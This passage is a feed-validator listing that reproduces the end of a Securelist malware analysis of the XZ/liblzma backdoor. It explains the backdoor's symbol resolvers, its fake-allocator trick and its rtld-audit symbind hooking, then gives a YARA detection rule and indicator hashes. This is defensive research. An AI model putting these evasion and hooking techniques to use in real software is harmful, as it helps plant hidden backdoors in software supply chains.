  2116. <div id="attachment_112368" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112368" class="size-large wp-image-112368" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-1024x195.png" alt="Symbol resolver example" width="1024" height="195" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-1024x195.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-300x57.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-768x146.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-740x141.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05-800x153.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150247/XZ_backdoor_analysis_05.png 1028w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112368" class="wp-caption-text">Symbol resolver example</p></div>
  2117. <p>One of the backdoor resolver functions iterates through all symbols and verifies which one has the desired key. If it is found, it returns the <strong>Elf64_Sym</strong> structure, which will later be used to populate an internal structure of the backdoor that holds all the necessary function pointers. This process is similar to that commonly seen in Windows threats with API hashing routines.</p>
  2118. <p>The backdoor searches many functions from the libcrypto (OpenSSL) library, as these will be used in later encryption routines. It also keeps track of how many functions it was able to find and resolve; this determines whether it is executing properly or should stop.</p>
  2119. <p>Another interesting symbol resolver abuses the <strong>lzma_alloc</strong> function, which is part of the liblzma library itself. This function serves as a helper for developers to allocate memory efficiently using the default allocator (malloc) or a custom one. In the case of the XZ backdoor, this function is abused to make use of a fake allocator. In reality, it functions as another symbol resolver. The parameter intended for &#8220;allocation size&#8221; is, in fact, the symbol key inside the trie. This trick is meant to complicate backdoor analysis.</p>
  2120. <div id="attachment_112369" style="width: 1007px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112369" class="size-full wp-image-112369" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06.png" alt="Symbol resolver using a fake allocator structure" width="997" height="98" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06.png 997w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-300x29.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-768x75.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-990x98.png 990w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-740x73.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150335/XZ_backdoor_analysis_06-800x79.png 800w" sizes="(max-width: 997px) 100vw, 997px" /></a><p id="caption-attachment-112369" class="wp-caption-text">Symbol resolver using a fake allocator structure</p></div>
  2121. <p>The backdoor dynamically resolves its symbols while executing; it doesn&#8217;t necessarily do so all at once or only when it needs to use them. The resolved symbols/functions range from legitimate OpenSSL functions to functions such as <strong>system</strong>, which is used to execute commands on the machine.</p>
  2122. <h3 id="the-symbind-hook">The Symbind hook</h3>
  2123. <p>As mentioned earlier, the primary objective of the backdoor initialization is to successfully hook functions. To do so, the backdoor makes use of <a href="https://www.man7.org/linux/man-pages/man7/rtld-audit.7.html" target="_blank" rel="noopener"><strong>rtdl-audit</strong></a>, a feature of the dynamic linker that enables the creation of custom shared libraries to be notified when certain events occur within the linker, such as symbol resolution. In a typical scenario, a developer would create a shared library following the <a href="https://www.man7.org/linux/man-pages/man7/rtld-audit.7.html" target="_blank" rel="noopener"><strong>rtdl-audit</strong> manual</a>. However, the XZ backdoor opts to perform a runtime patch on the already registered (default) interfaces loaded in memory, thereby hijacking the symbol-resolving routine.</p>
  2124. <div id="attachment_112370" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112370" class="size-large wp-image-112370" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-1024x194.png" alt="dl-audit runtime patch" width="1024" height="194" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-1024x194.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-300x57.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-768x146.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-740x141.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11-800x152.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150425/XZ_backdoor_analysis_11.png 1385w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112370" class="wp-caption-text">dl-audit runtime patch</p></div>
  2125. <p>The maliciously crafted structure <a href="https://elixir.bootlin.com/glibc/latest/source/sysdeps/generic/ldsodefs.h#L237" target="_blank" rel="noopener"><strong>audit_iface</strong></a>, stored in the <strong>dl_audit</strong> global variable within the dynamic linker&#8217;s memory area, contains the <strong>symbind64</strong> callback address, which is invoked by the dynamic linker. It sends all the symbol information to the backdoor control, which is then used to obtain a malicious address for the target functions, thus achieving hooking.</p>
  2126. <div id="attachment_112371" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112371" class="size-large wp-image-112371" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-1024x308.png" alt="Hooking placement inside the Symbind modified callback" width="1024" height="308" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-1024x308.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-300x90.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-768x231.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-740x222.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-932x280.png 932w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08-800x240.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150507/XZ_backdoor_analysis_08.png 1085w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112371" class="wp-caption-text">Hooking placement inside the Symbind modified callback</p></div>
  2127. <p>The addresses for <strong>dl_audit</strong> and <strong>dl_naudit</strong>, which holds the number of audit interfaces available, are obtained by disassembling both the <strong>dl_main</strong> and <strong>dl_audit_symbind_alt</strong> functions. The backdoor contains an internal minimalistic <strong>disassembler </strong>used for instruction decoding. It makes extensive use of it, especially when hunting for specific values like the <strong>*audit</strong> addresses.</p>
  2128. <div id="attachment_112372" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02.png" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112372" class="size-large wp-image-112372" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-1024x492.png" alt="dl_naudit hunting code" width="1024" height="492" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-1024x492.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-300x144.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-768x369.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-728x350.png 728w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-740x356.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-582x280.png 582w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02-800x385.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11150611/XZ_backdoor_analysis_02.png 1504w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112372" class="wp-caption-text">dl_naudit hunting code</p></div>
  2129. <p>The <strong>dl_naudit</strong> address is found by one of the <strong>mov </strong>instructions within the <strong>dl_main</strong> function code that accesses it. With that information, the backdoor hunts for access to a memory address and saves it.</p>
  2130. <p>It also verifies if the memory address acquired is the same address as the one accessed by the <strong>dl_audit_symbind_alt</strong> function on a given offset. This allows it to safely assume that it has indeed found the correct address. After it finds the <strong>dl_naudit </strong>address, it can easily calculate where <strong>dl_audit </strong>is, since the two are stored next to each other in memory.</p>
  2131. <h2 id="conclusion">Conclusion</h2>
  2132. <p>In this article, we covered the entire process of backdooring <strong>liblzma (XZ)</strong>, and delved into a detailed analysis of the binary backdoor code, up to achieving its principal goal: hooking.</p>
  2133. <p>It&#8217;s evident that this backdoor is highly complex and employs sophisticated methods to evade detection. These include the multi-stage implantation in the <strong>XZ</strong> repository, as well as the complex code contained within the binary itself.</p>
  2134. <p>There is still much more to explore about the backdoor&#8217;s internals, which is why we have decided to present this as <strong>Part I</strong> of the <strong>XZ</strong> backdoor series.</p>
  2135. <p>Kaspersky products detect malicious objects related to the attack as <strong>HEUR:Trojan.Script.XZ</strong> and <strong>Trojan.Shell.XZ</strong>. In addition, Kaspersky Endpoint Security for Linux detects malicious code in SSHD process memory as <strong>MEM:Trojan.Linux.XZ</strong> (as part of the Critical Areas Scan task).</p>
  2136. <h2 id="indicators-of-compromise">Indicators of compromise</h2>
  2137. <h3 id="yara-rules">Yara rules</h3>
  2138. <pre class="crayon-plain-tag">rule liblzma_get_cpuid_function {
  2139.   meta:
  2140. description = "Rule to find the malicious get_cpuid function CVE-2024-3094"
  2141.            author = "Kaspersky Lab"
  2142.   strings:
  2143.        $a = { F3 0F 1E FA 55 48 89 F5 4C 89 CE 53 89 FB 81 E7 00 00 00 80 48 83 EC 28 48 89 54 24 18 48 89 4C 24 10 4C 89 44 24 08 E8 ?? ?? ?? ?? 85 C0 74 27 39 D8 72 23 4C 8B 44 24 08 48 8B 4C 24 10 45 31 C9 48 89 EE 48 8B 54 24 18 89 DF E8 ?? ?? ?? ?? B8 01 00 00 00 EB 02 31 C0 48 83 C4 28 5B 5D C3 }  
  2144.    condition:
  2145.        $a
  2146. }</pre>
  2147. <h3 id="known-backdoored-libraries">Known backdoored libraries</h3>
  2148. <p><strong>Debian Sid liblzma.so.5.6.0</strong><br />
  2149. <a href="https://opentip.kaspersky.com/4f0cf1d2a2d44b75079b3ea5ed28fe54/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">4f0cf1d2a2d44b75079b3ea5ed28fe54</a><br />
  2150. 72e8163734d586b6360b24167a3aff2a3c961efb<br />
  2151. 319feb5a9cddd81955d915b5632b4a5f8f9080281fb46e2f6d69d53f693c23ae</p>
  2152. <p><strong>Debian Sid liblzma.so.5.6.1</strong><br />
  2153. <a href="https://opentip.kaspersky.com/53d82bb511b71a5d4794cf2d8a2072c1/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">53d82bb511b71a5d4794cf2d8a2072c1</a><br />
  2154. 8a75968834fc11ba774d7bbdc566d272ff45476c<br />
  2155. 605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4</p>
  2156. <p><strong>Related files</strong><br />
  2157. d302c6cb2fa1c03c710fa5285651530f, liblzma.so.5<br />
  2158. 4f0cf1d2a2d44b75079b3ea5ed28fe54, liblzma.so.5.6.0<br />
  2159. 153df9727a2729879a26c1995007ffbc, liblzma.so.5.6.0.patch<br />
  2160. 53d82bb511b71a5d4794cf2d8a2072c1, liblzma.so.5.6.1<br />
  2161. <a href="https://opentip.kaspersky.com/212ffa0b24bb7d749532425a46764433/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">212ffa0b24bb7d749532425a46764433</a>, liblzma_la-crc64-fast.o</p>
  2162. <p><strong>Analyzed artefacts</strong><br />
  2163. <a href="https://opentip.kaspersky.com/86fc2c94f8fa3938e3261d0b9eb4836be289f8ae/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">35028f4b5c6673d6f2e1a80f02944fb2</a>, bad-3-corrupt_lzma2.xz<br />
  2164. <a href="https://opentip.kaspersky.com/b4dd2661a7c69e85f19216a6dbbb1664/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">b4dd2661a7c69e85f19216a6dbbb1664</a>, build-to-host.m4<br />
  2165. <a href="https://opentip.kaspersky.com/540c665dfcd4e5cfba5b72b4787fec4f/?utm_source=SL&#038;utm_medium=SL&#038;utm_campaign=SL" target="_blank" rel="noopener">540c665dfcd4e5cfba5b72b4787fec4f</a>, good-large_compressed.lzma</p>
  2166. ]]></content:encoded>
  2168. <wfw:commentRss>https://securelist.com/xz-backdoor-story-part-1/112354/feed/</wfw:commentRss>
  2169. <slash:comments>2</slash:comments>
  2172. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-scaled.jpg" width="2666" height="1500"><media:keywords>full</media:keywords></media:content>
  2173. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-1024x576.jpg" width="1024" height="576"><media:keywords>large</media:keywords></media:content>
  2174. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-300x169.jpg" width="300" height="169"><media:keywords>medium</media:keywords></media:content>
  2175. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/11172300/sl-backdoor-keyhole-binary-malicious-actor-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  2176. </item>
  2177. </channel>
  2178. </rss>
  2179.  

If you would like to create a banner that links to this page (i.e. this validation result), do the following:

  1. Download the "valid RSS" banner.

  2. Upload the image to your own server. (This step is important. Please do not link directly to the image on this server.)

  3. Add this HTML to your page (change the image src attribute if necessary):

If you would like to create a text link instead, here is the URL you can use:

http://www.feedvalidator.org/check.cgi?url=https%3A//securelist.com/feed/

Home · About · News · Docs · Terms

 
Copyright © 2002-9 Sam Ruby, Mark Pilgrim, Joseph Walton, and Phil Ringnalda